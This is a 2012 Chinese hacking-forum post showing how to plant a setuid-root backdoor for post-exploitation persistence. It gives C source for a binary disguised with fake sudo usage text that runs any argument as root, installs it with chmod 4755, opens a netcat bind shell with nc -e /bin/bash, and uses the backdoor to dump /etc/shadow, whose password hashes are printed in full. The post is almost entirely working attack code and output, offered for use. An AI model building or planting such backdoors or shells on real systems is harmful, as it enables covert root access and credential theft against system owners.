切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
307 PHP SHELL A SEUID[复制链接]
发表于 2012-10-11 23:34:53 | 显示全部楼层 |!read_mode!
需要ROOT权限
  1. root@ubuntu:/tmp# cat uid.c
  2. # include <stdio.h>
  3. # include <string.h>

  4. int main(int argc, char* argv[])
  5. {
  6.         char cmd[1024];
  7.         if(argc < 2)
  8.         {
  9.                 printf("usage: sudo -h | -K | -k | -L | -V\n");
  10.                 printf("usage: sudo -v [-AknS] [-p prompt]\n");
  11.                 printf("usage: sudo -l[l] [-AknS] [-g groupname|#gid] [-p prompt] [-U username] [-u username|#uid] [-g groupname|#gid] [command]\n");
  12.                 printf("usage: sudo -e [-AknS] [-C fd] [-g groupname|#gid] [-p prompt] [-u username|#uid] file ...\n");
  13.                 exit(0);
  14.         }

  15.         setuid(0);
  16.         strcpy(cmd, " ");
  17.         strcat(cmd, argv[1]);
  18.     system(cmd);   
  19. }
  20. root@ubuntu:/tmp# gcc -o uid uid.c
  21. uid.c: In function ‘main’:
  22. uid.c:13: warning: incompatible implicit declaration of built-in function ‘exit’
  23. root@ubuntu:/tmp# mv uid /usr/bin/
  24. root@ubuntu:/var/www# chmod 4755 /usr/bin/uid
  25. root@ubuntu:/var/www# su www-data
  26. $ nc.traditional -e /bin/bash -lp 1234
复制代码
另一边
  1. root@Dis9Team:~# nc 5.5.5.8 1234
  2. id
  3. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  4. uid "id"
  5. uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
  6. uid "cat /etc/shadow"
  7. root:$6$5MxyvB.S$zqGS0XEMW/exhNy.P9UgIzmGqLdu3QkTKuxDEtOQU8PwP3Bgf85y2m5s2hiGroZRIrL50IP/yilcHx2Q4Z7ul0:15554:0:99999:7:::
  8. daemon:*:15554:0:99999:7:::
  9. bin:*:15554:0:99999:7:::
  10. sys:*:15554:0:99999:7:::
  11. sync:*:15554:0:99999:7:::
  12. games:*:15554:0:99999:7:::
  13. man:*:15554:0:99999:7:::
  14. lp:*:15554:0:99999:7:::
  15. mail:*:15554:0:99999:7:::
  16. news:*:15554:0:99999:7:::
  17. uucp:*:15554:0:99999:7:::
  18. proxy:*:15554:0:99999:7:::
  19. www-data:*:15554:0:99999:7:::
  20. backup:*:15554:0:99999:7:::
  21. list:*:15554:0:99999:7:::
  22. irc:*:15554:0:99999:7:::
  23. gnats:*:15554:0:99999:7:::
  24. nobody:*:15554:0:99999:7:::
  25. libuuid:!:15554:0:99999:7:::
  26. syslog:*:15554:0:99999:7:::
  27. sshd:*:15554:0:99999:7:::
  28. brk:$6$PA6.K0rF$URUYmeP54VPirQKslOhB1JlE4.L5FNSwyN.czHVMCBsti7TjY4akW1JA4W90Zcu6pciTSTr5KJa0m9IlNi1FX0:15554:0:99999:7:::
  29. mysql:!:15578:0:99999:7:::
复制代码



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-29 10:02

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部